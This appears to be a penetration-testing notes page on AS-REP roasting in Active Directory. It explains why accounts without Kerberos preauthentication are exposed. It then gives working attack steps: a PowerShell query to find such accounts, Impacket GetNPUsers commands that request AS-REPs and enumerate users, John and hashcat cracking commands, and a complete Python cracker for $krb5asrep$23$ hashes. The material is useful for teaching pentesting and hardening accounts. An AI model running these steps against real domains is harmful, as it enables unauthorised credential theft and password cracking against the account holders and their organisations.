# AS-REP Roast

## Theory

`AS-REP` roasting is an attack that is often overlooked. In my opinion it is not extremely common, because it only works against accounts that have been explicitly configured with `Do not require Kerberos preauthentication` (the `DONT_REQ_PREAUTH` flag in `userAccountControl`).

`Pre-Authentication` is the first step in Kerberos authentication and its main role is to prevent offline brute-force password guessing: the KDC will not hand out anything encrypted under a user's key until the client has proven that it already knows that key.

Typically during pre-auth the user's password is turned into a Kerberos key, which is used to encrypt a timestamp; the DC decrypts it to validate that the correct credentials were used and, if it verifies, issues a `TGT`. If `Pre-Authentication` is disabled, an attacker can send an `AS-REQ` for that user without knowing the password and the `DC` simply replies with an `AS-REP`. The TGT inside that reply is encrypted with the `krbtgt` key and is useless to us, but the `enc-part` of the `AS-REP` (which carries the session key) is encrypted with a key derived from the user's password, so that portion can be cracked offline, similar to the `Kerberoast` attack.

`AS-REP` roasting is cool because you don't even have to do it from a **Domain-Joined Machine** or as a `Domain-User`; you only need network access to the `KDC` (Kerberos, port 88). However, being on a **Domain-Joined Machine** or having domain creds makes the enumeration process way easier, as you can simply use an LDAP filter or PowerView to find targets.

Such as:

```powershell
# 4194304 = 0x400000 = the DONT_REQ_PREAUTH bit of userAccountControl
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
```

## Request AS-REP Message

If you have a credential, let the script find the roastable accounts itself. Impacket expects the target as `domain/username:password` (forward slash), and `-request` makes it actually send the `AS-REQ` for each account instead of only listing them:

```shell
impacket-GetNPUsers '<domain>/<username>:<password>' -dc-ip <dc_ip> -request -outputfile hashes.asreproast
```

If you don't have a credential, supply a list of candidate usernames. The KDC answers `KDC_ERR_PREAUTH_REQUIRED` for normal accounts and a full `AS-REP` for the roastable ones (non-existent names come back as `KDC_ERR_C_PRINCIPAL_UNKNOWN`, so this doubles as user enumeration):

```shell
impacket-GetNPUsers '<domain>/' -usersfile usernames.txt -dc-ip <dc_ip> -outputfile hashes.asreproast
```

Note that the trailing `/` in `<domain>/` is required, otherwise GetNPUsers won't recognize that string as a domain. The default output lines are in hashcat format (`$krb5asrep$23$user@DOMAIN:checksum$encrypted_data`); add `-format john` if you want the John-style line instead.

## AS-REP Cracking

Crack the encrypted part of the `AS-REP` (not the TGT itself, which is encrypted with the `krbtgt` key) with John:

```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast
```

Or with hashcat (mode 18200 is `Kerberos 5, etype 23, AS-REP`; `--force` only suppresses hashcat's device warnings and should not be needed on a working install):

```shell
hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt
```
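What the Theory section describes and what the cracking step above actually does, as an added example that is not part of the original page and not Impacket, John or hashcat code: a pure-Python verifier for the `$krb5asrep$23$` lines GetNPUsers writes. It first builds an RC4-HMAC (etype 23) AS-REP `enc-part` from a known password the way the KDC would (RFC 4757: `K1 = HMAC-MD5(NT hash, usage 8)`, checksum over `confounder || data`, RC4 under `K3 = HMAC-MD5(K1, checksum)`), then recovers the password from a wordlist by redoing only the client side of that computation per candidate. The account name, realm, passwords, confounder and the byte string standing in for the DER-encoded `EncASRepPart` are all constructed for this example; MD4 is implemented inline because `hashlib` frequently lacks it under OpenSSL 3.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
ASREP_USAGE = 8  # RC4-HMAC key usage for the AS-REP enc-part (what hashcat 18200 uses)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 over UTF-16-LE passwords."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b'\x80'
    while len(msg) % 64 != 56:
        msg += b'\x00'
    msg += struct.pack('<Q', (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        r = state[:]
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                j = (-i) % 4  # register updated at this step cycles a, d, c, b
                val = (r[j] + func(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4]) + x[k] + const) & MASK32
                r[j] = rotl(val, shifts[i % 4])
        state = [(s + t) & MASK32 for s, t in zip(state, r)]
    return struct.pack('<4I', *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode('utf-16-le'))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_k1(key: bytes, usage: int) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, 4-byte little-endian key usage)
    return hmac.new(key, struct.pack('<I', usage), hashlib.md5).digest()


def encrypt_asrep_part(key: bytes, plaintext: bytes, confounder: bytes):
    """KDC side: returns (checksum, ciphertext) exactly as they appear in the AS-REP enc-part."""
    k1 = rc4_hmac_k1(key, ASREP_USAGE)
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum, rc4(k3, confounder + plaintext)


def password_matches(key: bytes, cksum: bytes, edata: bytes) -> bool:
    """Attacker side: decrypt with the candidate key and see if the checksum verifies."""
    k1 = rc4_hmac_k1(key, ASREP_USAGE)
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plain = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), cksum)


def make_sample_hash(user: str, domain: str, password: str,
                     confounder: bytes = bytes(range(1, 9))) -> str:
    # Constructed stand-in for the DER-encoded EncASRepPart; the real one carries the session key.
    plaintext = b'EncASRepPart placeholder constructed for this example'
    cksum, edata = encrypt_asrep_part(nt_hash(password), plaintext, confounder)
    return f'$krb5asrep$23${user}@{domain}:{cksum.hex()}${edata.hex()}'


def parse_asrep_hash(line: str):
    prefix = '$krb5asrep$23$'
    if not line.startswith(prefix):
        raise ValueError('expected a hashcat-style etype-23 AS-REP line')
    ident, _, enc = line[len(prefix):].strip().partition(':')
    cksum_hex, _, edata_hex = enc.partition('$')
    cksum, edata = bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)
    if len(cksum) != 16 or len(edata) <= 8:  # 16-byte HMAC-MD5, 8-byte confounder + data
        raise ValueError('malformed checksum or encrypted data')
    return ident, cksum, edata


def crack_asrep(line: str, wordlist):
    """Returns the first candidate whose NT hash verifies the AS-REP checksum, else None."""
    _ident, cksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if password_matches(nt_hash(candidate), cksum, edata):
            return candidate
    return None


if __name__ == '__main__':
    line = make_sample_hash('svc-backup', 'CORP.LOCAL', 'Summer2019!')
    print(line)
    print('recovered:', crack_asrep(line, ['letmein', 'Winter2018', 'Summer2019!']))
```

Note what the cracker never touches: the TGT. Everything it needs is the 16-byte checksum and the encrypted part, and each candidate costs one MD4, two HMAC-MD5s and one RC4 pass, which is why mode 18200 runs so fast and why a weak password on a `DONT_REQ_PREAUTH` account falls quickly.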

## Reference

{% embed url="https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#as-rep-roasting" %}
How To Attack Kerberos 101 - m0chan
{% endembed %}
